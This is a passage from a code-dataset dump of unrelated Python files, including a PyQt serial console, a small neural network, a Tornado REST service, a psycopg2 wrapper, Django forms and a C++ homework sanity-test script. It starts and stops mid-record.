self.consoleSendEdit.returnPressed.connect(self.consoleSend)\r\n self.consoleSendButton.clicked.connect(self.consoleSend)\r\n\r\n self.downloadButton.clicked.connect(self.saveFileSelect)\r\n self.serialThread = None\r\n\r\n # Slots\r\n\r\n def fromSerial(self, data):\r\n self.appendToConsole(data + \"\\n\")\r\n\r\n def connectionToggle(self):\r\n if self.serialThread and self.serialThread.serial.is_open:\r\n self.serialThread.serial.close()\r\n self.serialThread.quit()\r\n self.connectButton.setText(\"Connect\")\r\n else:\r\n if (self.serialPortEdit.text() == '' or self.serialBaudEdit.text() == ''):\r\n QtWidgets.QMessageBox.information(self, \"Needed Information\", \"Please supply a COM port number and baudrate.\")\r\n return\r\n\r\n try:\r\n self.connectButton.setText(\"Connecting...\")\r\n self.connectButton.setEnabled(False)\r\n self.serialThread = SerialReceiver(str(self.serialPortEdit.text()), int(self.serialBaudEdit.text()), 10)\r\n self.serialThread.signal.connect(self.fromSerial)\r\n self.serialThread.start()\r\n self.connectButton.setEnabled(True)\r\n self.connectButton.setText(\"Disconnect\")\r\n except SerialException:\r\n self.connectButton.setEnabled(True)\r\n self.connectButton.setText(\"Connect\")\r\n QtWidgets.QMessageBox.critical(self, \"Connection Error\", \"Unable to connect to device. Check physical connection, COM port, and baudrate.\")\r\n\r\n def consoleSend(self):\r\n self.toSerial(self.consoleSendEdit.text())\r\n self.appendToConsole(self.consoleSendEdit.text())\r\n self.consoleSendEdit.clear()\r\n\r\n def toSerial(self, text):\r\n self.appendToConsole(text)\r\n\r\n def appendToConsole(self, text):\r\n if text:\r\n cursor = self.consoleRecieveEdit.textCursor()\r\n cursor.movePosition(cursor.End)\r\n cursor.insertText(str(text))\r\n self.consoleRecieveEdit.ensureCursorVisible()\r\n\r\n def saveFileSelect(self):\r\n self.path_to_file = QtWidgets.QFileDialog.getSaveFileName(self, \"Save As\", \"data.csv\", filter=\"csv (*.csv)\")\r\n self.serialThread.serial.write(\"!download\")\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n mainWindow = MainWindow()\r\n mainWindow.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"GUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"614692612","text":"import cv2 as cv\nimport numpy as np\n\nimagepath=\"/home/bobchen/annationdist/VOC/OriginalImages/MVI_7392_578.jpg\"\n\n\nimg=cv.imread(imagepath,1)\nimgn=np.array(img)\nprint(imgn.shape)\n# imgn[104,:]=(0,0,255)\n# imgn[:,169]=(0,0,255)\n#imgn[98:134,455:489]=(0,0,255)\nrates=(1920/871)\nimgn[int(98*rates):int(134*rates),int(455*rates):int(489*rates)]=(0,0,255)\ncv.imshow(\"showimage\",imgn)\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"98063529","text":"# 使用 *** 作为开始, **** 作为结束, 然后看一个文档是否合法\n\n\ndef load_file(file_name):\n res = None\n with open(file_name) as f:\n lines = f.readlines()\n # 确保最后一行换行\n if lines[-1][-1] != '\\n':\n lines[-1] += '\\n'\n res = [line[:-1] for line in lines]\n return res\n\n\ndef check(lines):\n cnt = 0\n line_num = 0\n i = 0\n for line in lines:\n i += 1\n if cnt == 0 and line == '***':\n cnt = 1\n line_num = i\n elif cnt == 1 and line == '***':\n line_num = i\n print('error line num is ', line_num )\n return False\n elif cnt == 1 and line == '****':\n cnt = 0\n elif cnt == 0 and line == '****':\n line_num = i\n print('error line num is ', line_num)\n return False\n if cnt > 0:\n print('error line num is ', line_num)\n return False\n return True\n\n\nif __name__ == '__main__':\n lines = load_file('DA16-优秀代码收录-原创与少数整理.md')\n print(check(lines))\n\n\n","sub_path":"NO12_Useful_tool/pair_checker.py","file_name":"pair_checker.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"196154110","text":"nazwa = 'cośtam'\n\ndef odwroc_string(string):\n \"\"\"\n Odraca podany string.\n :param string: str\n :return: str\n \"\"\"\n odwrocony = string[::-1]\n return odwrocony\n # return string[::-1]\n\ndef main():\n print(odwroc_string('cos sie dzieje'))\n\n odwr_zdanie = odwroc_string('ala ma kota')\n print(odwr_zdanie)\n\n odwr_zdanie = odwr_zdanie.upper()\n print(odwr_zdanie)\n\nif __name__ == '__main__':\n main()\n","sub_path":"dzien4_5_6/dzien5/odwracanie.py","file_name":"odwracanie.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387730097","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n def maxPathSum(self, root):\n self.max_sum = float('-inf')\n self.max_sum_helper(root)\n return self.max_sum\n\n def max_sum_helper(self, root):\n if root is None:\n return 0\n left = self.max_sum_helper(root.left)\n right = self.max_sum_helper(root.right)\n\n left = left if left > 0 else 0\n right = right if right > 0 else 0\n self.max_sum = max(self.max_sum, root.val + left + right)\n return root.val + max(left, right)\n","sub_path":"Python/094 Binary Tree Maximum Path Sum.py","file_name":"094 Binary Tree Maximum Path Sum.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"257988678","text":"# Copyright (C) 2014 by Alex Brandt \n#\n# etest is freely distributable under the terms of an MIT-style license.\n# See COPYING or http://www.opensource.org/licenses/mit-license.php.\n\nimport functools\nimport logging\nimport os\n\nfrom etest import ebuild\n\nlogger = logging.getLogger(__name__)\n\n\nclass Overlay(object):\n @property\n @functools.lru_cache(1)\n def directory(self):\n _ = os.getcwd()\n\n while _ != '/':\n if os.path.exists(os.path.join(_, 'metadata', 'layout.conf')):\n break\n\n _ = os.path.dirname(_)\n else:\n raise InvalidOverlayError('not in a valid ebuild repository directory')\n\n return _\n\n @property\n def ebuilds(self):\n for path, directories, files in os.walk(self.directory):\n if 'files' in directories:\n directories.remove('files')\n\n for _ in files:\n if _.endswith('.ebuild'):\n yield ebuild.Ebuild(os.path.relpath(os.path.join(path, _), self.directory), self)\n\n\nclass InvalidOverlayError(RuntimeError):\n pass\n","sub_path":"etest/overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"444287868","text":"\nfrom __future__ import division\nimport random\nimport time\nimport numpy as np\n\nclass NN():\n def __init__(self, layers):\n \n self.layers = layers\n self.L = len(layers) \n self.w = [np.random.randn(l2, l1 + 1) for l2, l1 in zip(layers[1:], layers[:-1])]\n \n def train(self, train_data, epochs, mini_batch_size, eta):\n \n # number of training data \n m = len(train_data)\n # cost\n cost = []\n for j in range(epochs):\n start_time = time.time()\n print('Epoch {0} begin...'.format(j + 1))\n # shuffle data before run\n random.shuffle(train_data)\n # divide data into mini batchs\n for k in range(0, m, mini_batch_size):\n mini_batch = train_data[k:k+mini_batch_size]\n m_batch = len(mini_batch)\n # calc gradient\n w_grad = [np.zeros(W.shape) for W in self.w]\n for x, y in mini_batch:\n grad = self.backprop(x, y)\n w_grad = [W_grad + g for W_grad, g in zip(w_grad, grad)]\n w_grad = [W_grad / m_batch for W_grad in w_grad]\n \n # check grad for first mini_batch in first epoch\n if j == 0 and k == 0 and not self.check_grad(mini_batch, w_grad):\n print('backprop fail!')\n return False\n \n # update w\n self.w = [W - eta * W_grad for W, W_grad in zip(self.w, w_grad)]\n \n # calc cost\n cost.append(self.cost(train_data))\n print('Epoch {0} done: {1}'.format(j + 1, time.time() - start_time))\n \n return cost\n \n def predict(self, x):\n\n _, a = self.feedforward(x)\n return np.argmax(a[-1])\n \n def evaluate(self, test_data):\n results = [(self.predict(x), y) for (x, y) in test_data]\n return sum(int(_y == y) for (_y, y) in results)\n \n def feedforward(self, x):\n \n z = []\n a = [self.add_bias(x)]\n for l in range(1, self.L):\n z_l = np.dot(self.w[l-1], a[l-1])\n a_l = self.sigmoid(z_l)\n if l < self.L - 1:\n a_l = self.add_bias(a_l)\n \n z.append(z_l)\n a.append(a_l)\n \n return (z, a)\n \n def backprop(self, x, y):\n\n w_grad = [np.zeros(W.shape) for W in self.w]\n # feedforward\n z, a = self.feedforward(x)\n # backward\n dz = a[-1] - y\n for _l in range(1, self.L):\n l = -_l # layer index\n if l < -1:\n da = self.sigmoid_grad(z[l])\n # do not calc for w_0 (da_0 / dz = 0 because of a_0 = 1 for all z)\n dz = np.dot(self.w[l+1][:, 1:].transpose(), dz) * da\n # gradient \n w_grad[l] = np.dot(dz, a[l-1].transpose())\n \n return w_grad\n \n def add_bias(self, a):\n\n return np.insert(a, 0, 1, axis=0)\n \n def check_grad(self, data, grad, epsilon=1e-4, threshold=1e-6):\n\n for l in range(self.L - 1):\n n_row, n_col = self.w[l].shape\n for i in range(n_row):\n for j in range(n_col):\n w_l_ij = self.w[l][i][j]\n # left\n self.w[l][i][j] = w_l_ij - epsilon\n l_cost = self.cost(data)\n # right\n self.w[l][i][j] = w_l_ij + epsilon\n r_cost = self.cost(data)\n # numerical grad\n num_grad = (r_cost - l_cost) / (2 * epsilon)\n \n # diff\n diff = abs(grad[l][i][j] - num_grad)\n \n # reset w\n self.w[l][i][j] = w_l_ij\n \n if diff > threshold:\n print('Check Grad Error at (l: {0}, col: {1}, row: {2}), | num_grad: {3} vs backprop grad: {4} | : {5}'\n .format(l, i, j, num_grad, grad[l][i][j], diff))\n return False\n \n return True\n \n def cost(self, data):\n\n m = len(data)\n j = 0\n for x, y in data:\n _, a = self.feedforward(x)\n a_L = a[-1]\n j += np.sum(np.nan_to_num(y*np.log(a_L) + (1-y)*np.log(1-a_L)))\n return -j / m\n \n def sigmoid(self, z):\n\n return 1.0 / (1.0 + np.exp(-z))\n \n def sigmoid_grad(self, z):\n\n s = self.sigmoid(z)\n return s * (1 - s)\n\n","sub_path":"Neural_Network/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"340268129","text":"\"\"\"\n@summary: This is a simple REST application that satisfies the requirements \n specified by: https://gist.github.com/sivy/04b285fc341314a9476f\n@author: CJ Grady\n@version: 1.0\n\"\"\"\nimport glob\nimport json\nimport os\n\nimport tornado.ioloop\nimport tornado.web\n\nif os.environ.has_key('RESOURCES_DIR'):\n RESOURCES_DIR = os.environ['RESOURCES_DIR']\nelse:\n RESOURCES_DIR = os.path.join(os.getcwd(), 'resources')\n\nINDEX_FN = os.path.join(RESOURCES_DIR, 'index.txt')\n\n# .............................................................................\nclass ResourcesHandler(tornado.web.RequestHandler):\n \"\"\"\n @summary: This is the handler for the /resources/ service endpoint.\n \"\"\"\n # ............................\n def get(self, *args, **kwargs):\n \"\"\"\n @summary: Calling the resources service with an HTTP GET request will\n attempt to retrieve a resource if an id is provided or it\n will list existing resources if no id is provided\n @note: This method does not take any query parameters at this time, but\n that could be a future improvement\n \"\"\"\n vpath = list(args)\n try:\n id = int(vpath.pop(0))\n except:\n id = None\n\n if id is not None: # Get a resource\n resourceFn = getFilenameForId(id)\n if os.path.exists(resourceFn):\n with open(resourceFn) as inF:\n resource = json.load(inF)\n self.set_header('Content-Type', 'application/json')\n self.set_status(200)\n self.write(json.dumps(resource))\n else: # if the file doesn't exist, throw a 404 error\n self.set_status(404, reason=\"Resource %s was not found\" % id)\n else: # List resources\n resources = []\n for fn in glob.iglob(os.path.join(RESOURCES_DIR, \"*.json\")):\n with open(fn, 'r') as resourceF:\n resources.append(json.load(resourceF))\n self.set_header('Content-Type', 'application/json')\n self.set_status(200)\n self.write(json.dumps(resources))\n\n # ............................\n def post(self, *args, **kwargs):\n \"\"\"\n @summary: Calling the resources service with an HTTP POST request will \n create a new resource on the file system with the uploaded \n content\n @precondition: The uploaded content must be in application/json format\n \"\"\"\n resource = json.loads(self.request.body)\n id = getNextId()\n outFn = getFilenameForId(id)\n \n # Attempt to handle race conditions by getting a new id\n while os.path.exists(outFn):\n id = getNextId()\n outFn = getFilenameForId(id)\n \n resource['id'] = id\n \n with open(outFn, 'w') as outF:\n json.dump(resource, outF)\n \n self.set_header('Content-Type', 'application/json')\n self.set_status(201)\n self.write(json.dumps(resource))\n\n# .............................................................................\ndef getFilenameForId(id):\n \"\"\"\n @summary: Gets the file name associated with this id\n \"\"\"\n return os.path.join(RESOURCES_DIR, '%s.json' % id)\n\n# .............................................................................\ndef getNextId():\n \"\"\"\n @summary: Gets the next available id for a new resource\n @todo: Evaluate the thread safety of this method. \n \"\"\"\n curId = 0\n try:\n with open(INDEX_FN, 'r') as inF:\n curId = int(inF.read())\n except: \n pass # We already initialized\n \n nextId = curId + 1\n \n # Write out the file again\n with open(INDEX_FN, 'w') as outF:\n outF.write(unicode(nextId))\n\n return nextId\n\n# .............................................................................\napplication = tornado.web.Application([\n (r\"/resources/(.*)\", ResourcesHandler),\n])\n\n# .............................................................................\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.current().start()\n","sub_path":"restApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"230559778","text":"from random import uniform #allows us to read CSV files\n\ndef read(CSVfileR):#taken from Intro II hw!Opens a file and returns the contents of the file in a list of strings\n data = open(CSVfileR,\"r\")\n CSV = data.readlines()\n data.close()\n return CSV\n\n#File = read(\"occupations.csv\")\ndef editData(list):#edits the list containing the contents of the csv file to make it easier to parse; returns totalPercentage as a float\n list.pop(0)#Removes column descriptions\n totalString = list[-1]\n totalString = totalString[0:len(totalString) -1]\n totalList = totalString.split(\",\")\n totalPercentage = float(totalList[1])\n list.pop()#Removes total occupation and percentage\n return totalPercentage#returns total percentage to be stored globally\n\n#totalPercentage = editData(File)#total percentage is stored globally\n#print (File)\n\ndef makeDict(list):#returns a dictionary using the occupation as the key and the percentage as the value\n dict = {}\n for string in list:\n string = string[0:len(string) -1]\n val = []\n if string[0] == '\"':#splits the string by double quotation marks if there are commas in the occupation description\n val = string.split('\"')\n val.pop(0)\n val[1] = val[1][1:]\n else:#splits the string by commas if there are no commas in the occupation description\n val = string.split(\",\")\n #print (l)\n dict[val[0]] = float(val[1])#Creates the dictionary using the occupation as the key and the percentage as the value\n return dict\n\n#Dict = makeDict(File)\ndef randOccupation(dict,totalPercentage):#returns a random occupation based on percentages in the data\n percent = uniform(0,totalPercentage)#picks a random float from 0 - 99.8\n for pval in dict:\n percent -= dict[pval]#subtracts each percentage from the randomly picked percentage from 0 - 99.\n if percent < 0:\n return pval\n#print (randOccupation(Dict))\n \ndef main():\n File = read(\"data/occupations.csv\")\n head = File[0]\n head = head[0:len(head) - 1] \n listH = head.split(\",\") #Splits up occ names for table\n h1 = listH[0] #Makes First header\n h2 = listH[1] #Makes Second header\n Data = File\n Data = Data[1: len(Data)]\n Data = makeDict(Data)\n totalPercentage = editData(File)#total percentage is stored globally\n Dict = makeDict(File) #Makes File into Dict again for randOccupation fnx\n return (randOccupation(Dict,totalPercentage), Data, h1, h2) #returns both rand occ, data for table, and headers\n\n","sub_path":"10_occupy_flask_st/util/parse_occupations.py","file_name":"parse_occupations.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"649658605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"MOD005622 TRI2 B01CAM\"\"\"\n__author__ = \"Tim Clarke\"\n__copyright__ = \"Copyright 2020, Tim Clarke/Zach Beed\"\n__license__ = \"Private\"\n__version__ = \"0.0.6\"\n\nimport sys\nimport psycopg2\nfrom psycopg2 import extras\n\n\"\"\"\ndb.py\n\n created by: Tim Clarke\n\n date: 29feb2020\n purpose: singleton database connection and query execution\n arguments: instantion: host and database strings\n returns: (see methods)\n\"\"\"\n\n\nclass Db(object):\n \"\"\"singleton database interaction interface\"\"\"\n # private variables\n _modulename = 'Db'\n _instance = None\n _conn = '' # psycopg2 database connection\n _cursor = '' # psycopg2 database cursor\n\n def __new__(self, *args, **kwargs):\n \"\"\"singleton override\"\"\"\n if not self._instance:\n self._instance = object.__new__(self)\n return self._instance\n\n def __init__(self, host, database):\n _functionname = '__init__'\n try:\n self._conn = psycopg2.connect(host=host, database=database)\n self._cursor = self._conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n raise RuntimeError(\"Error in {0}.{1}(): {2} at line {3}\".\n format(self._modulename, _functionname,\n str(exc_value),\n str(exc_traceback.tb_lineno)))\n\n def query(self, sql, *args):\n \"\"\"execute select statement with variable number of arguments\n returns: list of column names, list of lists of row data\n \"\"\"\n _functionname = 'query'\n\n try:\n if len(sql) < 1:\n raise RuntimeError('Empty query statement given')\n self._cursor.execute(sql, args)\n if self._cursor.rowcount < 1:\n return None, None\n else:\n # get column names from query\n colnames = [desc[0] for desc in self._cursor.description]\n return colnames, self._cursor.fetchall()\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n raise RuntimeError(\"Error in {0}.{1}(): {2} at line {3}\".\n format(self._modulename, _functionname,\n str(exc_value),\n str(exc_traceback.tb_lineno)))\n\n def insert(self, sql, *args):\n \"\"\"execute insert statement with variable number of arguments\n returns: nothing\n \"\"\"\n _functionname = 'insert'\n\n try:\n if len(sql) < 1:\n raise RuntimeError('Empty insert statement given')\n self._cursor.execute(sql, args)\n self._conn.commit()\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n raise RuntimeError(\"Error in {0}.{1}(): {2} at line {3}\".\n format(self._modulename, _functionname,\n str(exc_value),\n str(exc_traceback.tb_lineno)))","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529722940","text":"from django import forms\nfrom tempcontrol.models import *\nfrom django.contrib.admin import widgets\nfrom django.forms import BaseModelFormSet\n\n# Formulario de creacion de Control Proceso nuevo\nclass ControlPocesosCrearForm(forms.ModelForm):\n\t#fechaInicio = forms.DateField(widget=forms.SelectDateWidget())\n\t#fermentado1Fin = forms.DateField(widget=forms.SelectDateWidget())\n\t#fermentado2Fin = forms.DateField(widget=forms.SelectDateWidget())\n\t#maduradoFin = forms.DateField(widget=forms.SelectDateWidget())\n\t#clarificadoFin = forms.DateField(widget=forms.SelectDateWidget())\n\t\n\tclass Meta:\n\t\tmodel = ControlProcesos\n\t\tfields = ('coccionNum','fermentador','temperaturaPerfil')\n\t\t#fields = ('fechaInicio','fermentador','sensor','temperaturaPerfil','activo','fermentado1Fin','fermentado2Fin','maduradoFin','clarificadoFin')\n\n\nclass ControlPocesosForm(forms.ModelForm):\n class Meta:\n model = ControlProcesos\n fields = ('coccionNum','fechaInicio','fermentador','temperaturaPerfil','activo','fermentado1Fin','fermentado2Fin','maduradoFin','clarificadoFin')\n def __init__(self, *args, **kwargs):\n from django.forms.widgets import HiddenInput\n hide_condition = kwargs.pop('hide_condition',None)\n super(ControlPocesosForm, self).__init__(*args, **kwargs)\n if hide_condition:\n self.fields['fechaInicio'].widget = HiddenInput()\n self.fields['fermentado1Fin'].widget = HiddenInput()\n self.fields['fermentado2Fin'].widget = HiddenInput()\n self.fields['maduradoFin'].widget = HiddenInput()\n self.fields['clarificadoFin'].widget = HiddenInput()\n #self.fields['sensor'].widget = HiddenInput()\n # or alternately: del self.fields['fieldname'] to remove it from the form altogether.\n class BaseAuthorFormSet(BaseModelFormSet):\n\t def __init__(self, *args, **kwargs):\n\t \tsuper(BaseAuthorFormSet, self).__init__(*args, **kwargs)\n\t \tself.queryset = Fermentadores.objects.filter(activo=True)\n\n\n\n\nclass SensoresCrearFormm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Sensores\n\t\tfields = ('nombre','mac','activo')\n\nclass PerfilesTempCrearForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = TemperaturasPerfiles\n\t\tfields = ('nombre','diasFermentado1','diasFermentado2',\n\t\t\t'diasMadurado','diasclarificado','temperaturas','descripcion')\n\n\nclass PerfilTempForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = TemperaturasPerfiles\n\t\tfields = ('nombre','diasclarificado')\n\nclass FermentadorForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Fermentadores\n\t\tfields = ('id','nombre',)\n\n\n\t","sub_path":"tempcontrol/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"449099838","text":"#!/usr/bin/env python3\n\nimport os\nimport tarfile\nimport filecmp\n\n\n\n# use make file to compile to library\n\n# Create new file and put files in them\nos.system(\"mkdir /tmp/Test\")\nos.system(\"cp ex2.tar /tmp/Test\")\nos.system(\"cp test.cpp /tmp/Test\")\nos.system(\"cp results.txt /tmp/Test\")\n\n\ncurFolder = os.path.dirname(os.path.realpath(__file__))\nos.chdir(\"/tmp/Test\")\nfiles = tarfile.open(\"ex2.tar\")\nfiles.extractall(path=\".\", members=None)\nos.system(\"make\")\nos.system(\"g++ -c test.cpp\")\n\n# incase library was built in c++\nos.system(\"g++ test.o -L. -luthreads -o runtest\")\n\n#library is now linked now just run tests..\nos.system(\"runtest > output.txt\")\nos.system(\"diff results.txt output.txt > diff.txt\")\n# Check the two outputs\nif os.system(\"diff results.txt output.txt > diff.txt\"):\n\tprint(\"\\n--------Failed Sanity Check-------- \\nCheck the output.txt and diff.txt files\")\n\tos.system(\"cp diff.txt \" + curFolder)\n\tos.system(\"cp output.txt \" + curFolder)\nelse:\n\tprint(\"\\n--------Passed Sanity Check--------\")\n\nfiles.close()\nos.chdir(curFolder)\nos.system(\"rm -rf /tmp/Test\")\nprint(\"End Script\")\n\n\n\n\n\n","sub_path":"ex2sanity/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502390913","text":"# import getpass as gt\n\n# Hour = \"\"\n# RPH = 2.75\n# grossPay = \"\"\n\n# Val= isinstance(Hour,str)\n# Username= gt.getuser()\n# while Val:\n# try:\n# Hour = float(input(\"Enter the total hours you worked in a day:\"))\n# Val = isinstance(Hour,str)\n# except Exception as e:\n# print(\"Incorrect entry, please enter the hours in number.\")\n# else:\n# grossPay = Hour * RPH\n# print(\"Dear {0}, Your earning for a day is ${Pay} \".format(Username,Pay=grossPay))\n# print(f\"Dear {Username}, Your earning for a day is ${grossPay:.2f} \")\n\n\nimport getpass as gt\n\nHour = \"\"\nRPH = 10.50\nGrosspay = \"\"\nOvertime = 0\nOverTimePay = 0\nBasePay = 0\nVal=\"\"\n\nUsername = gt.getuser()\nVal = isinstance(Hour,str)\nwhile Val:\n try:\n Hour = float(input(\"Enter the total hours you worked in a day:\"))\n Val = isinstance(Hour,str)\n if Hour <= 40:\n Grosspay = Hour * RPH\n else:\n Overtime = Hour - 40\n BasePay = (Hour - Overtime) * RPH\n Grosspay = BasePay + (Overtime * (RPH * 1.5))\n except Exception as e:\n print(\"Incorrect entry, please enter the hours in number.\")\nelse: \n print(\"Dear {0}, Your earning for a day is ${Pay} \".format(Username,Pay=Grosspay))","sub_path":"Programs/Gross Pay.py","file_name":"Gross Pay.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305601103","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass BusinessParamsDTO(object):\n\n def __init__(self):\n self._actual_order_time = None\n self._campus_card = None\n self._card_type = None\n self._enterprise_pay_amount = None\n self._enterprise_pay_info = None\n self._good_taxes = None\n\n @property\n def actual_order_time(self):\n return self._actual_order_time\n\n @actual_order_time.setter\n def actual_order_time(self, value):\n self._actual_order_time = value\n @property\n def campus_card(self):\n return self._campus_card\n\n @campus_card.setter\n def campus_card(self, value):\n self._campus_card = value\n @property\n def card_type(self):\n return self._card_type\n\n @card_type.setter\n def card_type(self, value):\n self._card_type = value\n @property\n def enterprise_pay_amount(self):\n return self._enterprise_pay_amount\n\n @enterprise_pay_amount.setter\n def enterprise_pay_amount(self, value):\n self._enterprise_pay_amount = value\n @property\n def enterprise_pay_info(self):\n return self._enterprise_pay_info\n\n @enterprise_pay_info.setter\n def enterprise_pay_info(self, value):\n self._enterprise_pay_info = value\n @property\n def good_taxes(self):\n return self._good_taxes\n\n @good_taxes.setter\n def good_taxes(self, value):\n self._good_taxes = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.actual_order_time:\n if hasattr(self.actual_order_time, 'to_alipay_dict'):\n params['actual_order_time'] = self.actual_order_time.to_alipay_dict()\n else:\n params['actual_order_time'] = self.actual_order_time\n if self.campus_card:\n if hasattr(self.campus_card, 'to_alipay_dict'):\n params['campus_card'] = self.campus_card.to_alipay_dict()\n else:\n params['campus_card'] = self.campus_card\n if self.card_type:\n if hasattr(self.card_type, 'to_alipay_dict'):\n params['card_type'] = self.card_type.to_alipay_dict()\n else:\n params['card_type'] = self.card_type\n if self.enterprise_pay_amount:\n if hasattr(self.enterprise_pay_amount, 'to_alipay_dict'):\n params['enterprise_pay_amount'] = self.enterprise_pay_amount.to_alipay_dict()\n else:\n params['enterprise_pay_amount'] = self.enterprise_pay_amount\n if self.enterprise_pay_info:\n if hasattr(self.enterprise_pay_info, 'to_alipay_dict'):\n params['enterprise_pay_info'] = self.enterprise_pay_info.to_alipay_dict()\n else:\n params['enterprise_pay_info'] = self.enterprise_pay_info\n if self.good_taxes:\n if hasattr(self.good_taxes, 'to_alipay_dict'):\n params['good_taxes'] = self.good_taxes.to_alipay_dict()\n else:\n params['good_taxes'] = self.good_taxes\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = BusinessParamsDTO()\n if 'actual_order_time' in d:\n o.actual_order_time = d['actual_order_time']\n if 'campus_card' in d:\n o.campus_card = d['campus_card']\n if 'card_type' in d:\n o.card_type = d['card_type']\n if 'enterprise_pay_amount' in d:\n o.enterprise_pay_amount = d['enterprise_pay_amount']\n if 'enterprise_pay_info' in d:\n o.enterprise_pay_info = d['enterprise_pay_info']\n if 'good_taxes' in d:\n o.good_taxes = d['good_taxes']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/BusinessParamsDTO.py","file_name":"BusinessParamsDTO.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332900407","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 5 12:19:27 2017\n\n@author: nick\n\"\"\"\n\n# import numpy as np\n# import matplotlib.pyplot as plt\n# import os\n# import cv2\n#\n# folderO = \"/Users/yannick/Documents/Playground/Python/data/x_vs_o/circles\"\n# folderX = \"/Users/yannick/Documents/Playground/Python/data/x_vs_o/crosses\"\n#\n# N = len(os.listdir(folderO))\n# dataO = np.empty((N, 32, 32), dtype=np.uint8)\n# N = len(os.listdir(folderX))\n# dataX = np.empty((N, 32, 32), dtype=np.uint8)\n#\n# for i, fpath in enumerate(os.listdir(folderO)):\n# print(i, \":\", fpath)\n# dataO[i] = cv2.resize(cv2.imread(os.path.join(folderO, fpath), cv2.IMREAD_GRAYSCALE), (32,32), interpolation=cv2.INTER_AREA)\n#\n# for i, fpath in enumerate(os.listdir(folderX)):\n# print(i, \":\", fpath)\n# dataX[i] = cv2.resize(cv2.imread(os.path.join(folderX, fpath), cv2.IMREAD_GRAYSCALE), (32,32), interpolation=cv2.INTER_AREA)\n#\n# data_x = np.append(dataO, dataX, axis=0)\n# data_y = np.append(np.zeros(len(dataO)), np.ones(len(dataX)))\n#\n# f, axes = plt.subplots(2, 2, sharey=True)\n# axes[0][0].set_axis_off()\n# axes[0][0].imshow(dataO[100])\n# axes[1][0].set_axis_off()\n# axes[1][0].imshow(dataX[100])\n# axes[0][1].set_axis_off()\n# if data_y[100] == 0:\n# axes[0][1].set_title(\"Circle\")\n# else:\n# axes[0][1].set_title(\"Cross\")\n# axes[0][1].imshow(data_x[100])\n# axes[1][1].set_axis_off()\n# if data_y[1100] == 0:\n# axes[1][1].set_title(\"Circle\")\n# else:\n# axes[1][1].set_title(\"Cross\")\n# axes[1][1].imshow(data_x[1100])\n\n\n## VERSION 2\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\n\nsize_pix = 64\nfolderO = \"/home/nick/Documents/data/elephants_crop\"\n\nN = len(os.listdir(folderO))\ndataO = np.empty((N, size_pix, size_pix, 3), dtype=np.uint8)\n\nfor i, fpath in enumerate(os.listdir(folderO)):\n print(i, \":\", fpath)\n dataO[i] = cv2.resize(cv2.imread(os.path.join(folderO, fpath), cv2.IMREAD_COLOR), (size_pix,size_pix), interpolation=cv2.INTER_AREA)\n #dataO[i] = cv2.resize(cv2.imread(os.path.join(folderO, fpath), cv2.IMREAD_GRAYSCALE), (size_pix,size_pix), 